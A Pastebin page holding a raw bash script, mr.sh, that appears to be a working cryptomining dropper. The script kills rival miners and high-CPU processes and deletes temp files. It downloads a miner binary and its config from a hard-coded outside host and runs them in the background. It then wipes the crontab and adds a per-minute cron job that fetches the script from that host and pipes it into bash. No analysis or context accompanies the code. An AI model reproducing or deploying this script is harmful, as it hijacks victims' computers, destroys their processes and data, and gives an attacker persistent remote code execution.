Advertisement
Guest User

mr.sh

a guest
Sep 24th, 2018
492
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.75 KB | None | 0 0
  1. #!/bin/bash
  2. mkdir /var/tmp
  3. chmod 777 /var/tmp
  4. pkill -f getty
  5. netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  6. netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  7. netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  8. netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  9. netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  10. netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  11. netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  12. netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  13. netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  14. pkill -f /usr/bin/.sshd
  15. rm -rf /var/tmp/j*
  16. rm -rf /tmp/j*
  17. rm -rf /var/tmp/java
  18. rm -rf /tmp/java
  19. rm -rf /var/tmp/java2
  20. rm -rf /tmp/java2
  21. rm -rf /var/tmp/java*
  22. rm -rf /tmp/java*
  23. chmod 777 /var/tmp/sustes
  24. ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
  25. do
  26. kill -9 $procid
  27. done
  28. ps ax | grep /tmp/ | grep -v grep | grep -v 'sustes\|sustes\|ppl' | awk '{print $1}' | xargs kill -9
  29. ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'sustes\|sustes\|ppl' | awk '{print $1}' | xargs kill -9
  30. DIR="/var/tmp"
  31. if [ -a "/var/tmp/sustes" ]
  32. then
  33. if [ -w "/var/tmp/sustes" ] && [ ! -d "/var/tmp/sustes" ]
  34. then
  35. if [ -x "$(command -v md5sum)" ]
  36. then
  37. sum=$(md5sum /var/tmp/sustes | awk '{ print $1 }')
  38. echo $sum
  39. case $sum in
  40. c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
  41. echo "sustes OK"
  42. ;;
  43. *)
  44. echo "sustes wrong"
  45. pkill -f wc.conf
  46. pkill -f sustes
  47. sleep 4
  48. ;;
  49. esac
  50. fi
  51. echo "P OK"
  52. else
  53. DIR=$(mktemp -d)/var/tmp
  54. mkdir $DIR
  55. echo "T DIR $DIR"
  56. fi
  57. else
  58. if [ -d "/var/tmp" ]
  59. then
  60. DIR="/var/tmp"
  61. fi
  62. echo "P NOT EXISTS"
  63. fi
  64. if [ -d "/var/tmp/sustes" ]
  65. then
  66. DIR=$(mktemp -d)/var/tmp
  67. mkdir $DIR
  68. echo "T DIR $DIR"
  69. fi
  70. WGET="wget -O"
  71. if [ -s /usr/bin/curl ];
  72. then
  73. WGET="curl -o";
  74. fi
  75. if [ -s /usr/bin/wget ];
  76. then
  77. WGET="wget -O";
  78. fi
  79. f2="192.99.142.226:8220"
  80.  
  81. downloadIfNeed()
  82. {
  83. if [ -x "$(command -v md5sum)" ]
  84. then
  85. if [ ! -f $DIR/sustes ]; then
  86. echo "File not found!"
  87. download
  88. fi
  89. sum=$(md5sum $DIR/sustes | awk '{ print $1 }')
  90. echo $sum
  91. case $sum in
  92. c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
  93. echo "sustes OK"
  94. ;;
  95. *)
  96. echo "sustes wrong"
  97. sizeBefore=$(du $DIR/sustes)
  98. if [ -s /usr/bin/curl ];
  99. then
  100. WGET="curl -k -o ";
  101. fi
  102. if [ -s /usr/bin/wget ];
  103. then
  104. WGET="wget --no-check-certificate -O ";
  105. fi
  106. #$WGET $DIR/sustes https://transfer.sh/wbl5H/sustes
  107. download
  108. sumAfter=$(md5sum $DIR/sustes | awk '{ print $1 }')
  109. if [ -s /usr/bin/curl ];
  110. then
  111. echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustes` > $DIR/var/tmp.txt
  112. fi
  113. ;;
  114. esac
  115. else
  116. echo "No md5sum"
  117. download
  118. fi
  119. }
  120.  
  121. download() {
  122. if [ -x "$(command -v md5sum)" ]
  123. then
  124. sum=$(md5sum $DIR/sustes3 | awk '{ print $1 }')
  125. echo $sum
  126. case $sum in
  127. c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
  128. echo "sustes OK"
  129. cp $DIR/sustes3 $DIR/sustes
  130. ;;
  131. *)
  132. echo "sustes wrong"
  133. download2
  134. ;;
  135. esac
  136. else
  137. echo "No md5sum"
  138. download2
  139. fi
  140. }
  141.  
  142. download2() {
  143. if [ `getconf LONG_BIT` = "64" ]
  144. then
  145. $WGET $DIR/sustes http://192.99.142.226:8220/xm64
  146. fi
  147.  
  148. if [ -x "$(command -v md5sum)" ]
  149. then
  150. sum=$(md5sum $DIR/sustes | awk '{ print $1 }')
  151. echo $sum
  152. case $sum in
  153. c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
  154. echo "sustes OK"
  155. cp $DIR/sustes $DIR/sustes3
  156. ;;
  157. *)
  158. echo "sustes wrong"
  159. ;;
  160. esac
  161. else
  162. echo "No md5sum"
  163. fi
  164. }
  165.  
  166. judge() {
  167. if [ ! "$(netstat -ant|grep '158.69.133.20\|192.99.142.249\|202.144.193.110'|grep 'ESTABLISHED'|grep -v grep)" ];
  168. then
  169. ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid
  170. do
  171. kill -9 $procid
  172. done
  173. downloadIfNeed
  174. touch /var/tmp/123
  175. pkill -f /var/tmp/java
  176. pkill -f w.conf
  177. chmod +x $DIR/sustes
  178. $WGET $DIR/wc.conf http://$f2/wt.conf
  179. nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &
  180. sleep 5
  181. else
  182. echo "Running"
  183. fi
  184. }
  185.  
  186. judge2() {
  187. if [ ! "$(ps -fe|grep '/var/tmp/sustes'|grep 'wc.conf'|grep -v grep)" ];
  188. then
  189. downloadIfNeed
  190. chmod +x $DIR/sustes
  191. $WGET $DIR/wc.conf http://$f2/wt.conf
  192. nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &
  193. sleep 5
  194. else
  195. echo "Running"
  196. fi
  197. }
  198.  
  199. if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
  200. then
  201. judge2
  202. else
  203. judge
  204. fi
  205.  
  206. if crontab -l | grep -q "192.99.142.226:8220"
  207. then
  208. echo "Cron exists"
  209. else
  210. crontab -r
  211. echo "Cron not found"
  212. LDR="wget -q -O -"
  213. if [ -s /usr/bin/curl ];
  214. then
  215. LDR="curl";
  216. fi
  217. if [ -s /usr/bin/wget ];
  218. then
  219. LDR="wget -q -O -";
  220. fi
  221. (crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
  222. fi
  223. rm -rf /var/tmp/jrm
  224. rm -rf /tmp/jrm
  225. pkill -f 185.222.210.59
  226. pkill -f 95.142.40.81
  227. pkill -f 192.99.142.232
  228. chmod 777 /var/tmp/sustes
  229. crontab -l | sed '/185.222.210.59/d' | crontab -
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement